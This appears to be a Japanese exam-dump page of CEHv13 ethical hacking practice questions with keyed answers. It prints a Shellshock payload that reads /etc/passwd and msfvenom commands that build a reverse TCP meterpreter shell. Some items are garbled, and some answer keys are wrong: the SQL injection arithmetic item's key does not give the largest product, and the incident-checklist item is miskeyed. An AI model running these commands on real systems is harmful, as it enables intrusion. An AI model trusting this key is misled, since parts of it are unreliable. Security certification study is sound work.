312-50v13無料問題集「ECCouncil Certified Ethical Hacker Exam (CEHv13)」

質問 1

E-mail scams and mail fraud are regulated by which of the following?

（A）18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices

（B）18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral Communication

（C）18 U.S.C. par. 1362 Communication Lines, Stations, or Systems

（D）18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers

正解：D 解答を投票する

質問 2

Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet switch?

（A）Evil twin attack

（B）DDoS attack

（C）DNS cache flooding

（D）MAC flooding

正解：D 解答を投票する

質問 3

Which of the following statements is FALSE with respect to Intrusion Detection Systems?

（A）Intrusion Detection Systems can examine the contents of the data n context of the network protocol

（B）Intrusion Detection Systems require constant update of the signature library

（C）Intrusion Detection Systems can be configured to distinguish specific content in network packets

（D）Intrusion Detection Systems can easily distinguish a malicious payload in an encrypted traffic

正解：D 解答を投票する

質問 4

Which of the following Bluetooth hacking techniques does an attacker use to send messages to users without the recipient's consent, similar to email spamming?

（A）Bluesnarfing

（B）Bluesmacking

（C）BlueSniffing

（D）Bluejacking

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 5

Which tool can be used to silently copy files from USB devices?

（A）Use Dumper

（B）USB Grabber

（C）USB Sniffer

（D）USB Snoopy

正解：A 解答を投票する

質問 6

Thomas, a cloud security professional, is performing security assessment on cloud services to identify any loopholes. He detects a vulnerability in a bare-metal cloud server that can enable hackers to implant malicious backdoors in its firmware. He also identified that an installed backdoor can persist even if the server is reallocated to new clients or businesses that use it as an laaS.
What is the type of cloud attack that can be performed by exploiting the vulnerability discussed in the above scenario?

（A）Cloud cryptojacking

（B）Metadata spoofing attack

（C）Cloudborne attack

（D）Man-in-the-cloud (MITC) attack

正解：C 解答を投票する

質問 7

env x='(){ :;};echo exploit' bash -c 'cat/etc/passwd'
What is the Shellshock bash vulnerability attempting to do on a vulnerable Linux host?

（A）Removes the passwd file

（B）Changes all passwords in passwd

（C）Display passwd content to prompt

（D）Add new user to the passwd file

正解：C 解答を投票する

質問 8

Bob, your senior colleague, has sent you a mail regarding a deal with one of the clients. You are requested to accept the offer and you oblige. After 2 days, Bab denies that he had ever sent a mail. What do you want to
""know"" to prove yourself that it was Bob who had send a mail?

（A）Confidentiality

（B）Integrity

（C）Authentication

（D）Non-Repudiation

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 9

Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by johnson in the above scenario?

（A）Distributed assessment

（B）Wireless network assessment

（C）Application assessment

（D）Host-based assessment

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 10

A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current time from the target host machine.
Which of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan?

（A）-PY

（B）-Pn

（C）-PP

（D）-PU

正解：C 解答を投票する

質問 11

During a recent vulnerability assessment of a major corporation's IT systems, the security team identified several potential risks. They want to use a vulnerability scoring system to quantify and prioritize these vulnerabilities. They decide to use the Common Vulnerability Scoring System (CVSS). Given the characteristics of the identified vulnerabilities, which of the following statements is the most accurate regarding the metric types used by CVSS to measure these vulnerabilities?

（A）Temporal metric represents the inherent qualities of a vulnerability

（B）Environmental metric involves the features that change during the lifetime of the vulnerability

（C）Base metric represents the inherent qualities of a vulnerability

（D）Temporal metric involves measuring vulnerabilities based on a_ specific environment or implementation

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 12

Bob received this text message on his mobile phone: "Hello, this is Scott Smelby from the Yahoo Bank.
Kindly contact me for a vital transaction on: [email protected]". Which statement below is true?

（A）This is a scam as everybody can get a @yahoo address, not the Yahoo customer service employees.

（B）This is probably a legitimate message as it comes from a respectable organization.

（C）This is a scam because Bob does not know Scott.

（D）Bob should write to [email protected] to verify the identity of Scott.

正解：A 解答を投票する

質問 13

A sophisticated attacker targets your web server with the intent to execute a Denial of Service (DoS) attack.
His strategy involves a unique mixture of TCP SYN, UDP, and ICMP floods, using 'r' packets per second.
Your server, reinforced with advanced security measures, can handle 'h' packets per second before it starts showing signs of strain. If 'r' surpasses 'h', it overwhelms the server, causing it to become unresponsive. In a peculiar pattern, the attacker selects 'r' as a composite number and 'h' as a prime number, making the attack detection more challenging. Considering 'r=2010' and different values for 'h', which of the following scenarios would potentially cause the server to falter?

（A）h=1993 (prime): Despite being less than 'r', the server's prime number capacity keeps it barely operational, but the risk of falling is imminent

（B）h=1987 (prime): The attacker's packet rate exceeds the server's capacity, causing potential unresponsiveness

（C）h=2003 (prime): The server can manage more packets than the attacker is sending, hence it stays operational

（D）h=1999 (prime): Despite the attacker's packet flood, the server can handle these requests, remaining responsive

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 14

In an intricate web application architecture using an Oracle database, you, as a security analyst, have identified a potential SQL Injection attack surface. The database consists of 'x' tables, each with y columns.
Each table contains z1 records. An attacker, well-versed in SQLi techniques, crafts 'u' SQL payloads, each attempting to extract maximum data from the database. The payloads include UNION SELECT' statements and 'DBMS_XSLPPOCESSOR.READ2CLOB' to read sensitive files. The attacker aims to maximize the total data extracted E=xyz'u'. Assuming 'x=4\ y=2\ and varying z' and 'u\ which situation is likely to result in the highest extracted data volume?

（A）z=550, u=Z Here, the attacker formulates 2 SQL payloads and directs them towards tables containing
550 records, impacting all columns and tables

（B）z=600. u=2: The attacker devises 2 SQL payloads. each aimed at tables holding 600 records, affecting all columns across all tables

（C）z=400. u=4: The attacker constructs A SQLpayloads, each focusing on tables with 400 records, influencing all columns of all tables

（D）Az=500. u=3: The attacker creates 3 SQL payloads and targets tables with 500 records each, exploiting all columns and tables

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 15

When considering how an attacker may exploit a web server, what is web server footprinting?

（A）When an attacker uses a brute-force attack to crack a web-server password

（B）When an attacker implements a vulnerability scanner to identify weaknesses

（C）When an attacker gathers system-level data, including account details and server names

（D）When an attacker creates a complete profile of the site's external links and file structures

正解：C 解答を投票する

質問 16

An audacious attacker is targeting a web server you oversee. He intends to perform a Slow HTTP POST attack, by manipulating 'a' HTTP connection. Each connection sends a byte of data every 'b' second, effectively holding up the connections for an extended period. Your server is designed to manage 'm' connections per second, but any connections exceeding this number tend to overwhelm the system. Given
'a=100' and variable 'm', along with the attacker's intention of maximizing the attack duration 'D=a*b', consider the following scenarios. Which is most likely to result in the longest duration of server unavailability?

（A）m=105, b=12: The server can manage 105 connections per second, more than the attacker's 100 connections, likely maintaining operation despite a moderate hold-up time

（B）95, b=10: Here, the server can handle 95 connections per second, but it falls short against the attacker's 100 connections, albeit the hold-up time per connection is lower

（C）m=110, b=20: Despite the attacker sending 100 connections, the server can handle 110 connections per second, therefore likely staying operative, regardless of the hold-up time per connection

（D）m=90, b=15: The server can manage 90 connections per second, but the attacker's 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant

正解：D 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 17

John is an incident handler at a financial institution. His steps in a recent incident are not up to the standards of the company. John frequently forgets some steps and procedures while handling responses as they are very stressful to perform. Which of the following actions should John take to overcome this problem with the least administrative effort?

（A）Select someone else to check the procedures.

（B）Create an incident checklist.

（C）Increase his technical skills.

（D）Read the incident manual every time it occurs.

正解：C 解答を投票する

質問 18

what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

（A）msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

（B）msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

（C）msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

（D）msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

正解：B 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 19

Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven enabled iTunes WI-FI sync on the computer so that the device could continue communication with that computer even after being physically disconnected.
Now, Clark gains access to Steven's iPhone through the infected computer and is able to monitor and read all of Steven's activity on the iPhone, even after the device is out of the communication zone.
Which of the following attacks is performed by Clark in above scenario?

（A）lOS Jailbreaking

（B）Exploiting SS7 vulnerability

（C）IOS trustjacking

（D）Man-in-the-disk attack

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

質問 20

You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management Console from command line.
Which command would you use?

（A）c:\gpedit

（B）c:\services.msc

（C）c:\compmgmt.msc

（D）c:\ncpa.cp

正解：C 解答を投票する

解説: (JPNTest メンバーにのみ表示されます)

312-50v13 無料問題集「ECCouncil Certified Ethical Hacker Exam (CEHv13)」

弊社を連絡する

関連リンク

トップ試験